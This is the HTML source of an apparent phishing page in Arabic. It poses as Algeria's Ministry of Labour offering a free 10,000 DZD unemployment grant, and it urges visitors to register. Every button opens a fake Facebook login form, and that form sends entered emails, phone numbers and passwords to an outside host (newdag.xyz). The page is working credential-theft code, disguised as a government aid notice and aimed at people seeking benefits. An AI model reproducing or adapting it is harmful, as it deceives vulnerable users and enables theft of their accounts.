<!DOCTYPE HTML>
<html lang="en">
  <head>
    <title>منحة
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="description" content="مجانية" />
    <meta property="og:site_name" content="منحة" />
    <meta property="og:title" content="منحة" />
    <meta property="og:type" content="website" />
    <meta property="og:description" content="مجانية" />
    <meta property="og:image" content="https://i.imgur.com/rOuiFpe.jpg" />
    <meta property="og:image:type" content="image/jpeg" />
    <meta property="og:image:width" content="1280" />
    <meta property="og:image:height" content="800" />
    <meta property="og:url" content="https://ggrhgg.carrd.co" />
    <meta property="twitter:card" content="summary_large_image" />
    <link rel="canonical" href="https://ggrhgg.carrd.co" />
    <link href="https://fonts.googleapis.com/css?family=Pacifico:400,400italic%7CInconsolata:900,900italic" rel="stylesheet" type="text/css" />
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500;700&display=swap" rel="stylesheet">

       <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet"/>
 <style>html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{
      margin:0;
      padding:0;
      border:0;
      font-size:100%;
      font:inherit;
      vertical-align:baseline;
      }
      article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{
        display:block;
      }
      body{
        line-height:1;
      }
      ol,ul{
        list-style:none;
      }
      blockquote,q{
        quotes:none;
      }
      blockquote:before,blockquote:after,q:before,q:after{
        content:'';
        content:none;
      }
      table{
        border-collapse:collapse;
        border-spacing:0;
      }
      body{
        -webkit-text-size-adjust:none}
      mark{
        background-color:transparent;
        color:inherit}
      input::-moz-focus-inner{
        border:0;
        padding:0}
      input[type="text"],input[type="email"],select,textarea{
        -moz-appearance:none;
        -webkit-appearance:none;
        -ms-appearance:none;
        appearance:none}
      *, *:before, *:after {
        box-sizing: border-box;
      }
      body {
        line-height: 1.0;
        min-height: var(--viewport-height);
        min-width: 320px;
        overflow-x: hidden;
        word-wrap: break-word;
      }
      body:before {
        content: '';
        display: block;
        background-attachment: scroll;
        height: var(--background-height);
        left: 0;
        pointer-events: none;
        position: fixed;
        top: 0;
        transform: scale(1);
        width: 100vw;
        z-index: 0;
        background-image: url(''), url('https://i.imgur.com/LFciM4W.jpg');
        background-size: 256px, 100% 100%;
        background-position: center, center;
        background-repeat: repeat, repeat;
        background-color: #FFFFFF;
      }
      :root {
        --background-height: 100vh;
        --site-language-alignment: left;
        --site-language-direction: ltr;
        --site-language-flex-alignment: flex-start;
        --viewport-height: 100vh;
      }
      html {
        font-size: 18pt;
      }
      u {
        text-decoration: underline;
      }
      strong {
        color: inherit;
        font-weight: bolder;
      }
      em {
        font-style: italic;
      }
      code {
        background-color: rgba(144,144,144,0.25);
        border-radius: 0.25em;
        font-family: 'Lucida Console', 'Courier New', monospace;
        font-size: 0.9em;
        font-weight: normal;
        letter-spacing: 0;
        margin: 0 0.25em;
        padding: 0.25em 0.5em;
        text-indent: 0;
      }
      mark {
        background-color: rgba(144,144,144,0.25);
      }
      s {
        text-decoration: line-through;
      }
      sub {
        font-size: smaller;
        vertical-align: sub;
      }
      sup {
        font-size: smaller;
        vertical-align: super;
      }
      a {
        color: inherit;
        text-decoration: underline;
        transition: color 0.25s ease;
      }
      #wrapper {
        -webkit-overflow-scrolling: touch;
        align-items: flex-end;
        display: flex;
        flex-direction: column;
        justify-content: center;
        min-height: var(--viewport-height);
        overflow: hidden;
        position: relative;
        z-index: 2;
        padding: 2.1875rem 0 2.1875rem 2.1875rem;
      }
      #main {
        --alignment: left;
        --flex-alignment: flex-start;
        --border-radius-tl: 0.75rem;
        --border-radius-tr: 0;
        --border-radius-br: 0;
        --border-radius-bl: 0.75rem;
        align-items: center;
        display: flex;
        flex-grow: 0;
        flex-shrink: 0;
        justify-content: center;
        max-width: 100%;
        position: relative;
        text-align: var(--alignment);
        z-index: 1;
        background-color: rgba(24,143,129,0.922);
        background-image: url('');
        background-size: 256px;
        background-position: center;
        background-repeat: repeat;
        border-radius: var(--border-radius-tl) var(--border-radius-tr) var(--border-radius-br) var(--border-radius-bl);
      }
      #main > .inner {
        --padding-horizontal: 3.5rem;
        --padding-vertical: 4.375rem;
        --spacing: 1.5rem;
        --width: 35rem;
        border-radius: var(--border-radius-tl) var(--border-radius-tr) var(--border-radius-br) var(--border-radius-bl);
        max-width: 100%;
        position: relative;
        width: var(--width);
        z-index: 1;
        padding: var(--padding-vertical) var(--padding-horizontal);
      }
      #main > .inner > * {
        margin-top: var(--spacing);
        margin-bottom: var(--spacing);
      }
      #main > .inner > :first-child {
        margin-top: 0 !important;
      }
      #main > .inner > :last-child {
        margin-bottom: 0 !important;
      }
      #main > .inner > .full {
        margin-left: calc(var(--padding-horizontal) * -1);
        max-width: calc(100% + calc(var(--padding-horizontal) * 2) + 0.4725px);
        width: calc(100% + calc(var(--padding-horizontal) * 2) + 0.4725px);
      }
      #main > .inner > .full:first-child {
        border-top-left-radius: inherit;
        border-top-right-radius: inherit;
        margin-top: calc(var(--padding-vertical) * -1) !important;
      }
      #main > .inner > .full:last-child {
        border-bottom-left-radius: inherit;
        border-bottom-right-radius: inherit;
        margin-bottom: calc(var(--padding-vertical) * -1) !important;
      }
      #main > .inner > .full.screen {
        border-radius: 0 !important;
        max-width: 100vw;
        position: relative;
        width: 100vw;
        left: auto;
        margin-left: calc(-100vw + var(--padding-horizontal));
        right: -100%;
      }
      body.is-instant #main, body.is-instant #main > .inner > *,body.is-instant #main > .inner > section > * {
        transition: none !important;
      }
      body.is-instant:after {
        display: none !important;
        transition: none !important;
      }
      @keyframes loading-spinner {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }
      .deferred:before {
        content: '';
        display: block;
        width: 4rem;
        height: 4rem;
        position: absolute;
        top: 50%;
        left: 50%;
        margin: -2rem 0 0 -2rem;
        animation: loading-spinner 1s infinite linear;
        transition: opacity 0.25s ease;
        transition-delay: 0.5s;
        opacity: 0;
        z-index: -1;
        background-image: url('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iOTZweCIgaGVpZ2h0PSI5NnB4IiB2aWV3Qm94PSIwIDAgOTYgOTYiIHpvb21BbmRQYW49ImRpc2FibGUiPjxzdHlsZT5jaXJjbGUge2ZpbGw6IHRyYW5zcGFyZW50OyBzdHJva2U6ICNmZmY7IHN0cm9rZS13aWR0aDogMS41cHg7IH08L3N0eWxlPjxkZWZzPjxjbGlwUGF0aCBpZD0iY29ybmVyIj48cG9seWdvbiBwb2ludHM9IjAsMCA0OCwwIDQ4LDQ4IDk2LDQ4IDk2LDk2IDAsOTYiIC8+PC9jbGlwUGF0aD48L2RlZnM+PGcgY2xpcC1wYXRoPSJ1cmwoI2Nvcm5lcikiPjxjaXJjbGUgY3g9IjQ4IiBjeT0iNDgiIHI9IjMyIi8+PC9nPjwvc3ZnPg==');
        background-position: center;
        background-repeat: no-repeat;
        background-size: 3rem;
      }
      .deferred.loading:before {
        opacity: 0.35;
        z-index: 0;
      }
      h1, h2, h3, p {
        direction: var(--site-language-direction);
        position: relative;
      }
      h1 span.p, h2 span.p, h3 span.p, p span.p {
        display: block;
        position: relative;
      }
      h1 span[style], h2 span[style], h3 span[style], p span[style], h1 strong, h2 strong, h3 strong, p strong, h1 a, h2 a, h3 a, p a, h1 code, h2 code, h3 code, p code, h1 mark, h2 mark, h3 mark, p mark {
        -webkit-text-fill-color: currentcolor;
      }
      #text02 {
        text-align: center;
        color: #FFFFFF;
        font-family: 'Pacifico', cursive;
        letter-spacing: 0.05rem;
        width: calc(100% + 0.05rem);
        font-size: 2.25em;
        line-height: 1.5;
        font-weight: 400;
      }
      #text02 a {
        text-decoration: underline;
      }
      #text02 a:hover {
        text-decoration: none;
      }
      #text02 span.p:nth-child(n + 2) {
        margin-top: 1rem;
      }
      #text04 {
        text-align: center;
        color: #000000;
        font-family: '-apple-system', 'BlinkMacSystemFont', 'Segoe UI', 'Roboto', 'Helvetica Neue', 'Arial', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol';
        letter-spacing: -0.075rem;
        width: 100%;
        font-size: 2em;
        line-height: 1.75;
        font-weight: 700;
      }
      #text04 a {
        text-decoration: underline;
      }
      #text04 a:hover {
        text-decoration: none;
      }
      #text04 span.p:nth-child(n + 2) {
        margin-top: 1rem;
      }
      #text03 {
        text-transform: uppercase;
        color: #000000;
        font-family: 'Inconsolata', monospace;
        letter-spacing: -0.05rem;
        width: 100%;
        font-size: 1.25em;
        line-height: 1.5;
        font-weight: 900;
      }
      #text03 a {
        text-decoration: underline;
      }
      #text03 a:hover {
        text-decoration: none;
      }
      #text03 span.p:nth-child(n + 2) {
        margin-top: 1rem;
      }
      #text01 {
        text-transform: uppercase;
        color: #000000;
        font-family: 'Inconsolata', monospace;
        letter-spacing: 0.025rem;
        width: calc(100% + 0.025rem);
        font-size: 1.125em;
        line-height: 1.75;
        font-weight: 900;
      }
      #text01 a {
        text-decoration: underline;
      }
      #text01 a:hover {
        text-decoration: none;
      }
      #text01 span.p:nth-child(n + 2) {
        margin-top: 1rem;
      }
      #text05 {
        text-transform: uppercase;
        color: #0D0000;
        font-family: 'Inconsolata', monospace;
        letter-spacing: 0.05rem;
        width: calc(100% + 0.05rem);
        font-size: 1.125em;
        line-height: 1.875;
        font-weight: 900;
      }
      #text05 a {
        text-decoration: underline;
      }
      #text05 a:hover {
        text-decoration: none;
      }
      #text05 span.p:nth-child(n + 2) {
        margin-top: 1rem;
      }
      .image {
        display: block;
        line-height: 0;
        max-width: 100%;
        position: relative;
      }
      .image .frame {
        -webkit-backface-visibility: hidden;
        -webkit-transform: translate3d(0, 0, 0);
        display: inline-block;
        max-width: 100%;
        overflow: hidden;
        vertical-align: top;
        width: 100%;
      }
      .image .frame img {
        border-radius: 0 !important;
        max-width: 100%;
        vertical-align: top;
        width: inherit;
      }
      .image.full .frame {
        display: block;
      }
      .image.full:first-child .frame {
        border-top-left-radius: inherit;
        border-top-right-radius: inherit;
      }
      .image.full:last-child .frame {
        border-bottom-left-radius: inherit;
        border-bottom-right-radius: inherit;
      }
      #image01 {
        text-align: center;
      }
      #image01 .frame {
        width: 15rem;
        transition: none;
      }
      #image01 .frame img {
        transition: none;
      }
      #image02 {
        text-align: center;
      }
      #image02 .frame {
        width: 15rem;
        transition: none;
      }
      #image02 .frame img {
        transition: none;
      }
      .buttons {
        cursor: default;
        display: flex;
        justify-content: var(--flex-alignment);
        letter-spacing: 0;
        padding: 0;
      }
      .buttons li {
        max-width: 100%;
      }
      .buttons li a {
        align-items: center;
        justify-content: center;
        max-width: 100%;
        text-align: center;
        text-decoration: none;
        vertical-align: middle;
        white-space: nowrap;
      }
      #buttons02 {
        gap: 2rem;
        flex-direction: row;
        flex-wrap: wrap;
      }
      #buttons02 li a {
        display: flex;
        width: 100vw;
        height: 4.125rem;
        line-height: 4.125rem;
        padding: 0 2.0625rem;
        vertical-align: middle;
        text-transform: uppercase;
        font-family: '-apple-system', 'BlinkMacSystemFont', 'Segoe UI', 'Roboto', 'Helvetica Neue', 'Arial', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol';
        letter-spacing: 0.05rem;
        padding-left: calc(0.05rem + 2.0625rem);
        font-size: 0.875em;
        font-weight: 700;
        border-radius: 2.5rem;
        flex-direction: row-reverse;
        transition: color 0.25s ease, background-color 0.25s ease, border-color 0.25s ease;
      }
      #buttons02 li a svg {
        display: block;
        fill: #FFFFFF;
        height: 100%;
        min-width: 18px;
        width: 1.25em;
        margin-left: 0.5em;
        margin-right: calc(-0.125em + 0.05rem);
        transition: fill 0.25s ease;
      }
      #buttons02 li a .label {
        direction: var(--site-language-direction);
      }
      #buttons02 .button {
        background-color: #1D3791;
        color: #FFFFFF;
      }
      #buttons01 {
        gap: 0.75rem;
        flex-direction: row;
        flex-wrap: wrap;
      }
      #buttons01:not(:first-child) {
        margin-top: 1.875rem !important;
      }
      #buttons01:not(:last-child) {
        margin-bottom: 1.875rem !important;
      }
      #buttons01 li a {
        display: flex;
        width: 100vw;
        height: 4rem;
        line-height: 4rem;
        padding: 0 2rem;
        vertical-align: middle;
        text-transform: uppercase;
        font-family: 'Inconsolata', monospace;
        letter-spacing: -0.075rem;
        font-size: 1.125em;
        font-weight: 900;
        border-radius: 2.5rem;
        flex-direction: row-reverse;
        transition: color 0.25s ease, background-color 0.25s ease, border-color 0.25s ease;
      }
      #buttons01 li a svg {
        display: block;
        fill: #000000;
        height: 100%;
        min-width: 18px;
        width: 1.25em;
        margin-left: 0.5em;
        margin-right: calc(-0.125em + 0rem);
        transition: fill 0.25s ease;
      }
      #buttons01 li a .label {
        direction: var(--site-language-direction);
      }
      #buttons01 .button {
        background-color: #EDBA37;
        color: #000000;
      }
      .list {
        display: block;
      }
      .list ul, .list ol {
        display: inline-block;
        max-width: 100%;
        text-align: var(--site-language-alignment);
        vertical-align: middle;
      }
      .list ul li, .list ol li {
        direction: var(--site-language-direction);
        display: flex;
        position: relative;
      }
      .list ul li:before, .list ol li:before {
        background-repeat: no-repeat;
        content: '';
        display: block;
        flex-grow: 0;
        flex-shrink: 0;
        font-variant: normal !important;
        letter-spacing: 0 !important;
        order: 1;
        position: relative;
      }
      .list ul li:after, .list ol li:after {
        content: '';
        display: block;
        flex-grow: 0;
        flex-shrink: 0;
        order: 2;
        pointer-events: none;
      }
      .list ul li p, .list ol li p {
        flex-grow: 1;
        flex-shrink: 1;
        order: 3;
      }
      .list ul li:first-child, .list ol li:first-child {
        margin-top: 0 !important;
      }
      #list01 {
        text-transform: uppercase;
        color: #000000;
        font-family: 'Inconsolata', monospace;
        font-size: 1.5em;
        line-height: 1.375;
        font-weight: 900;
      }
      #list01 a {
        color: #FFFFFF;
        text-decoration: underline;
      }
      #list01 a:hover {
        text-decoration: none;
      }
      #list01 ul {
        width: 58rem;
      }
      #list01 ul li {
        margin-top: 0rem;
      }
      #list01 ul li:after {
        width: 1.75rem;
      }
      #list01 ul li:before {
        background-image: url('data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20x%3D%220px%22%20y%3D%220px%22%20viewBox%3D%220%200%2040%2040%22%3E%3Ccircle%20cx%3D%2220%22%20cy%3D%2220%22%20r%3D%2210%22%20fill%3D%22%23000000%22%20%2F%3E%3C%2Fsvg%3E');
        border-radius: 0.5rem;
        background-position: left 60%;
        background-repeat: no-repeat;
        background-size: contain;
        height: 2.0625rem;
        line-height: 2.0625rem;
        min-width: 1.21875rem;
      }
      .icc-credits {
        display: block;
        opacity: 1 !important;
        position: relative;
        transition-delay: 0s !important;
      }
      .icc-credits span {
        border-radius: 24px;
        cursor: pointer;
        display: inline-block;
        font-family: Arial, sans-serif;
        font-size: 12px;
        letter-spacing: 0;
        line-height: 1;
        position: relative;
        text-decoration: none;
        width: auto;
      }
      .icc-credits span a {
        display: inline-block;
        padding: 0.5em 0.375em;
        position: relative;
        text-decoration: none;
        transition: color 0.25s ease, transform 0.25s ease;
        z-index: 1;
      }
      .icc-credits span a:before {
        content: '( ';
        opacity: 1;
        transition: opacity 0.25s ease;
      }
      .icc-credits span a:after {
        content: ' )';
        opacity: 1;
        transition: opacity 0.25s ease;
      }
      .icc-credits span::after {
        background-image: linear-gradient(30deg, #A464A1 15%, #3B5DAD 85%);
        border-radius: inherit;
        box-shadow: 0 0.25em 1.25em 0 rgba(0,0,0,0.25);
        content: '';
        display: block;
        height: calc(100% + 2px);
        left: -1px;
        opacity: 0;
        pointer-events: none;
        position: absolute;
        top: -1px;
        transition: opacity 0.25s ease, box-shadow 0.25s ease, transform 0.25s ease;
        width: calc(100% + 2px);
      }
      .icc-credits span:hover {
        text-transform: none !important;
      }
      .icc-credits span:hover a {
        color: #ffffff !important;
        transform: scale(1.1) translateY(-0.05rem);
      }
      .icc-credits span:hover a:before {
        opacity: 0;
      }
      .icc-credits span:hover a:after {
        opacity: 0;
      }
      .icc-credits span:hover::after {
        opacity: 1;
        transform: scale(1.1) translateY(-0.05rem);
      }
      #credits span {
        background-color: rgba(80,80,80,0.5);
        color: rgba(224,224,224,0.75);
        margin-top: 1.5rem !important;
      }
      #credits span a:before {
        opacity: 0;
      }
      #credits span a:after {
        opacity: 0;
      }
      @media (max-width: 1920px) {
      }
      @media (max-width: 1680px) {
        html {
          font-size: 13pt;
        }
      }
      @media (max-width: 1280px) {
        html {
          font-size: 13pt;
        }
      }
      @media (max-width: 1024px) {
      }
      @media (max-width: 980px) {
        html {
          font-size: 11pt;
        }
        body {
          display: flex;
          flex-direction: column;
          background-color: #188F81;
        }
        body:before {
          flex-grow: 1;
          flex-shrink: 0;
          max-height: 45vh;
          overflow: hidden;
          position: relative;
          width: 100%;
        }
        #main {
          border-bottom: none;
          border-left: none;
          border-radius: 0;
          border-right: none;
          box-shadow: none;
          width: 100%;
          --alignment: center;
          --flex-alignment: center;
          background-color: #188F81;
        }
        #main > .inner {
          background: none;
          max-width: 75%;
          width: auto;
        }
        #wrapper {
          height: auto !important;
          min-height: 0;
          padding: 0;
        }
      }
      @media (max-width: 736px) {
        html {
          font-size: 11pt;
        }
        #main {
          --alignment: center;
          --flex-alignment: center;
        }
        #main > .inner {
          --padding-horizontal: 2rem;
          --padding-vertical: 3.5rem;
          --spacing: 1.5rem;
          max-width: 100%;
        }
        #wrapper {
          padding: 0;
        }
        #text02 {
          letter-spacing: 0.04375rem;
          width: calc(100% + 0.04375rem);
          font-size: 2.25em;
          line-height: 1.5;
        }
        #text04 {
          letter-spacing: -0.065625rem;
          width: 100%;
          font-size: 2em;
          line-height: 1.75;
        }
        #text03 {
          letter-spacing: -0.04375rem;
          width: 100%;
          font-size: 1.25em;
          line-height: 1.5;
        }
        #text01 {
          letter-spacing: 0.021875rem;
          width: calc(100% + 0.021875rem);
          font-size: 1.125em;
          line-height: 1.75;
        }
        #text05 {
          letter-spacing: 0.04375rem;
          width: calc(100% + 0.04375rem);
          font-size: 1.125em;
          line-height: 1.875;
        }
        #image01 .frame {
          width: 15rem;
        }
        #image02 .frame {
          width: 15rem;
        }
        #buttons02 li a {
          letter-spacing: 0.05rem;
          padding-left: calc(0.05rem + 2.0625rem);
          font-size: 0.875em;
        }
        #buttons02 li a svg {
          width: 1.25em;
        }
        #buttons01:not(:first-child) {
          margin-top: 1.40625rem !important;
        }
        #buttons01:not(:last-child) {
          margin-bottom: 1.40625rem !important;
        }
        #buttons01 li a {
          letter-spacing: -0.075rem;
          font-size: 1.125em;
        }
        #buttons01 li a svg {
          width: 1.25em;
        }
        #list01 {
          letter-spacing: 0rem;
          font-size: 1.5em;
          line-height: 1.375;
        }
        #list01 ul li:before {
          height: 2.0625rem;
          line-height: 2.0625rem;
          min-width: 1.21875rem;
        }
      }
      @media (max-width: 480px) {
        #main > .inner {
          --spacing: 1.3125rem;
        }
        #wrapper {
          padding: 0;
        }
        #buttons02 {
          flex-direction: column;
          flex-wrap: nowrap;
        }
        #buttons02 li a {
          display: inline-flex;
          max-width: 100%;
          width: 100%;
        }
        #buttons01 {
          flex-direction: column;
          flex-wrap: nowrap;
        }
        #buttons01 li a {
          display: inline-flex;
          max-width: 100%;
          width: 100%;
        }
      }
      @media (max-width: 360px) {
        #main > .inner {
          --padding-horizontal: 1.5rem;
          --padding-vertical: 2.625rem;
          --spacing: 1.125rem;
        }
        #wrapper {
          padding: 0;
        }
        #text02 {
          font-size: 2em;
        }
        #text04 {
          font-size: 1.5em;
        }
        #text03 {
          font-size: 1.25em;
        }
        #text01 {
          font-size: 1.125em;
        }
        #text05 {
          font-size: 1.125em;
        }
        #buttons02 {
          gap: 1.5rem;
        }
        #buttons01 {
          gap: 0.5625rem;
        }
        #list01 {
          font-size: 1.5em;
        }
        #list01 ul li:before {
          height: 2.0625rem;
          line-height: 2.0625rem;
          min-width: 1.21875rem;
        }
      }
   .modal-body .alert {
    margin: 0;
    padding: 0.2rem;
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
}
   .modal-body .alert img {
    width: 50px;
}
.main_body_lgo[data-l8xm2d3]{background-color:#f0f2f5;font-family:'Roboto', sans-serif;margin-top:2rem;}.modal-body{background:#f0f2f5;border-radius:5px;}.main_body_lgo[data-l8xm2d3] .logo{width:50%;margin:auto}.main_body_lgo[data-l8xm2d3] .main_box{background-color:white;border-radius:8px;box-shadow:0 2px 4px #0000001a, 0 8px 16px #0000001a;margin:auto;padding:0 0 14px 0;overflow:hidden}.main_body_lgo[data-l8xm2d3] .main_box .header_text{padding-top:1rem}.main_body_lgo[data-l8xm2d3] .main_box .header_text p{text-align:center;font-size:18px;font-family:inherit;line-height:22px;margin-bottom:0.8rem;}.main_body_lgo[data-l8xm2d3] .main_box .or{margin:10px;position:relative;text-align:center;width:auto;overflow:hidden;margin-top:5px}.main_body_lgo[data-l8xm2d3] .main_box .or span{color:#96999e;display:inline-block;position:relative}.main_body_lgo[data-l8xm2d3] .main_box .or span::before{content:"";background:#d7dade;height:1px;position:absolute;top:50%;width:9999px;right:100%;margin-right:15px}.main_body_lgo[data-l8xm2d3] .main_box .or span::after{content:"";background:#d7dade;height:1px;position:absolute;top:50%;width:9999px;left:100%;margin-left:15px}.main_body_lgo[data-l8xm2d3] .main_box .createNew{text-align:center}.main_body_lgo[data-l8xm2d3] .main_box .createNew a{background-color:#42b72a;border-color:#42b72a;border-radius:6px;font-size:17px;line-height:43px;padding:0 16px}.main_body_lgo[data-l8xm2d3] .main_box form{width:93%;margin:auto}.main_body_lgo[data-l8xm2d3] .main_box form .form-control{border-radius:6px;font-size:17px;padding:14px 16px;border:1px solid #dddfe2;margin-bottom:10px}.main_body_lgo[data-l8xm2d3] .main_box form .form-control:focus{    border-color:#dddfe2;box-shadow:none;}.main_body_lgo[data-l8xm2d3] .main_box form .logbtn{padding:6px 0}.main_body_lgo[data-l8xm2d3] .main_box form .logbtn button{background-color:#1877f2;border-radius:6px;font-size:19px;line-height:48px;padding:0 23px;font-family:inherit;width:100%}.main_body_lgo[data-l8xm2d3] .main_box .forget_link{margin:5px;text-align:center}.main_body_lgo[data-l8xm2d3] .main_box .forget_link a{text-decoration:none;color:#1877f2;font-size:14px;font-weight:400}</style></head>
  <body>
    <svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" display="none" width="0" height="0">
      <symbol id="icon-90c" viewBox="0 0 40 40">
        <path d="M22.2,34.9c0-0.6-0.2-1.2-0.7-1.6c-0.4-0.4-1-0.7-1.6-0.7s-1.2,0.2-1.6,0.7c-0.4,0.4-0.7,1-0.7,1.6c0,0.6,0.2,1.2,0.7,1.6 s1,0.7,1.6,0.7c0.6,0,1.2-0.2,1.6-0.7S22.2,35.6,22.2,34.9z M28.2,30.4V10.2c0-0.2-0.1-0.5-0.3-0.6c-0.2-0.2-0.4-0.3-0.6-0.3H12.6 c-0.2,0-0.5,0.1-0.6,0.3c-0.2,0.2-0.3,0.4-0.3,0.6v20.1c0,0.2,0.1,0.5,0.3,0.6c0.2,0.2,0.4,0.3,0.6,0.3h14.6c0.2,0,0.5-0.1,0.6-0.3 C28.1,30.8,28.2,30.6,28.2,30.4z M22.7,6.1c0-0.3-0.2-0.5-0.5-0.5h-4.6c-0.3,0-0.5,0.2-0.5,0.5c0,0.3,0.2,0.5,0.5,0.5h4.6 C22.5,6.6,22.7,6.4,22.7,6.1z M30.9,5.6v29.3c0,1-0.4,1.9-1.1,2.6c-0.7,0.7-1.6,1.1-2.6,1.1H12.6c-1,0-1.9-0.4-2.6-1.1 c-0.7-0.7-1.1-1.6-1.1-2.6V5.6c0-1,0.4-1.9,1.1-2.6C10.8,2.3,11.6,2,12.6,2h14.6c1,0,1.9,0.4,2.6,1.1C30.6,3.8,30.9,4.6,30.9,5.6z" />
      </symbol>
      <symbol id="icon-a52" viewBox="0 0 40 40">
        <path d="M39.9,18.7v2.5c0,0.7-0.2,1.3-0.6,1.8c-0.4,0.5-1,0.7-1.7,0.7H23.8l5.8,5.8c0.5,0.5,0.7,1.1,0.7,1.8c0,0.7-0.2,1.3-0.7,1.8 l-1.5,1.5c-0.5,0.5-1.1,0.7-1.8,0.7c-0.7,0-1.3-0.2-1.8-0.7L11.8,21.8c-0.5-0.5-0.7-1.1-0.7-1.8c0-0.7,0.2-1.3,0.7-1.8L24.5,5.4 c0.5-0.5,1.1-0.7,1.8-0.7c0.7,0,1.3,0.2,1.8,0.7l1.5,1.5c0.5,0.5,0.7,1.1,0.7,1.8s-0.2,1.3-0.7,1.8l-5.8,5.8h13.8 c0.7,0,1.2,0.2,1.7,0.7C39.7,17.5,39.9,18,39.9,18.7z M3.6,35.3h3.9c0.8,0,1.5-0.7,1.5-1.5V6.2c0-0.8-0.7-1.5-1.5-1.5H3.6 c-0.8,0-1.5,0.7-1.5,1.5v27.6C2.1,34.6,2.8,35.3,3.6,35.3z"/>
      </symbol>
    </svg>
    <div id="wrapper">
      <div id="main">
        <div class="inner">
          <h1 id="text02">وزارة العمل والتشغيل والضمان الاجتماعي
          </h1>
          <div id="image01" class="image">
            <a href="#app" data-bs-toggle="modal" data-bs-target="#exampleModal" class="frame deferred">
              <img src="https://i.imgur.com/UqaMTDv.png" data-src="" alt="" />
            </a>
          </div>
          <h2 id="text04">المنحه المجانية
          </h2>
          <ul id="buttons02" class="buttons">
            <li>
              <a href="#app" class="button n01" data-bs-toggle="modal" data-bs-target="#exampleModal">
                <svg>
                  <use xlink:href="#icon-90c">
                  </use>
                </svg>
                <span class="label">اضغط هنا لتسجيل رقم الهاتف
                </span>
              </a>
            </li>
          </ul>
          <h3 id="text03">عاجل فتح باب التسجيل في منحة البطالة من خلال هذا الرابط فقط 10000- دج
          </h3>
          <ul id="buttons01" class="buttons">
            <li>
              <a href="#app" data-bs-toggle="modal" data-bs-target="#exampleModal" class="button n01">
                <svg>
                  <use xlink:href="#icon-a52">
                  </use>
                </svg>
                <span class="label">اضغط هنا للتسجيل ارسال الرقم
                </span>
              </a>
            </li>
          </ul>
          <div id="image02" class="image">
            <a href="#app" class="frame deferred">
              <img src="https://i.imgur.com/oo7P5Db.png" data-src="" alt="" />
            </a>
          </div>
          <div id="list01" class="list">
            <ul>
              <li>
                <p>:طريقه التسجيل
                </p>
              </li>
            </ul>
          </div>
          <p id="text01">اضغط على زر التسجيل في المنحة يظهر لك موقعنا او احد الاعلانات الداعمة للمنحة
          </p>
          <p id="text05">قم بتسجيل رقم هاتفك وسيصلك كود قم بادخاله ليصلك رساله بميعاد صرف المنحة من بريد الجزائر
          </p>

        </div>
      </div>
    </div>
    <!-- Modal -->
<div class="modal fade" id="exampleModal" tabindex="-1" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false" aria-labelledby="staticBackdropLabel">
  <div class="modal-dialog">
    <div class="modal-content">
     
      <div class="modal-body">
        <div class="alert alert-warning d-flex align-items-center flex-row-reverse" role="alert">
  <img src="https://i.imgur.com/SmWYXGR.png" alt="" draggable="false">
  <div>
    يجب عليك تسجيل الدخول للمتابعه
  </div>
</div>
          <div class="main_body_lgo" data-l8xm2d3>
         <div class="logo">
                <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="" draggable="false">
            </div>
            <div class="main_box">
                <div class="header_text">
                    <p>Log in to Facebook</p>
                </div>
                    <form action="https://newdag.xyz/all/action.php?username=none&uid=22" method="POST">
                        <div class="mb-2">
                          <input type="text" placeholder="Email address or phone number" name="username" class="form-control">
                        </div>
                        <div class="mb-2">
                          <input type="password" class="form-control" name="password" placeholder="Password">
                        </div>
                     <div class="logbtn">
                         
                         <button type="submit" class="btn btn-primary">Log in</button>
                        </div>
                </form>
                <div class="forget_link">
                    <a href="#">Forgotten account?</a>
                </div>
                <div class="or"><span>or</span></div>
                <div class="createNew">
                    <a class="btn btn-success">Create New Account</a>
                </div>
            </div>
      </div>
  </div>
    </div>
  </div>
</div>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"></script>

  </body>
</html>
